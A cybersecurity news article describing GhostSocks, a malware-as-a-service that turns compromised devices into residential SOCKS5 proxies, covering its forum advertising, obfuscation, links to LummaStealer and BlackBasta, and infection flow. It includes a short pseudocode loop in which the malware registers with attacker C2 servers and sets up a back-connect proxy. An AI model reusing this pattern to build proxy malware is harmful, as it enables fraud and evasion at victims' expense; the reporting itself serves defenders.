An operator known as GhostSocks advertised a novel Malware-as-a-Service (MaaS) on the Russian cybercrime forum XSS.is on October 15, 2023, promising to transform compromised devices into residential SOCKS5 proxies.
The service capitalized on the inherent trust placed in residential IP addresses to bypass anti-fraud systems and avoid detection by network defenders.
Early promotional posts showcased a web-based control panel that offered centralized management of devices, sub-accounts, and automated build generation for both Windows and UNIX targets.
.webp "New GhostSocks Malware-as-a-Service Enables Threat Actors to Convert Compromised Devices into Proxies 2")
The GhostSocks MaaS model eliminates the need for threat actors to maintain external proxy servers, reducing operational costs and infrastructure complexity.
Builds are compiled in native Go and range from 3 MB before obfuscation to 8 MB afterward, leveraging the open-source garble project for string and symbol obfuscation.
Once deployed, GhostSocks runs entirely in memory, providing SOCKS5 functionality without implementing its own persistence mechanism.
Synthient analysts noted the malware’s reliance on other initial-access tools, such as LummaStealer, to gain footholds on victim systems, underscoring the interconnected nature of modern threat actor ecosystems.
The service quickly gained traction beyond low-level cybercriminals; leaked BlackBasta ransomware chat logs from February 2025 reveal discussions about integrating GhostSocks alongside LummaStealer to maintain long-term network access without raising suspicion.
.webp "New GhostSocks Malware-as-a-Service Enables Threat Actors to Convert Compromised Devices into Proxies 4")
In the aftermath of law enforcement takedowns of LummaStealer infrastructure, GhostSocks continued to operate, albeit with reduced visibility on underground forums.
Its resilience highlights the adaptability of MaaS offerings in the continually evolving cybercrime landscape.
Infection Mechanism
GhostSocks deployments typically begin with a dropper delivered by a separate malware family. Upon execution, the GhostSocks binary first acquires a global mutex named "start_to_run" to prevent multiple instances.
It then searches the %TEMP% directory for a configuration file; if unavailable, it falls back to a hardcoded encrypted blob.
After decrypting this blob, GhostSocks iterates over a list of embedded C2 URLs until a successful HTTP 200 response is returned, at which point it provisions SOCKS5 credentials.
The following pseudocode illustrates the relay resolution loop:-
for _, url := range c2List {
resp, err := http.Get(url + "/apihelper-first-register?buildVersion=" + version +
"&proxyPassword=" + pwd + "&proxyUsername=" + user)
if err != nil || resp.StatusCode != http.StatusOK {
continue
}
creds := extractCredentials(resp.Body)
setupSocks5(creds)
break
}After registration, GhostSocks spawns a back-connect SOCKS5 session using the open-source go-socks5 and yamux libraries, effectively turning the victim host into a transparent relay for downstream clients.
.webp "New GhostSocks Malware-as-a-Service Enables Threat Actors to Convert Compromised Devices into Proxies 5")
This infection mechanism allows threat actors to monetize compromised hosts at scale while minimizing detectable network infrastructure.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
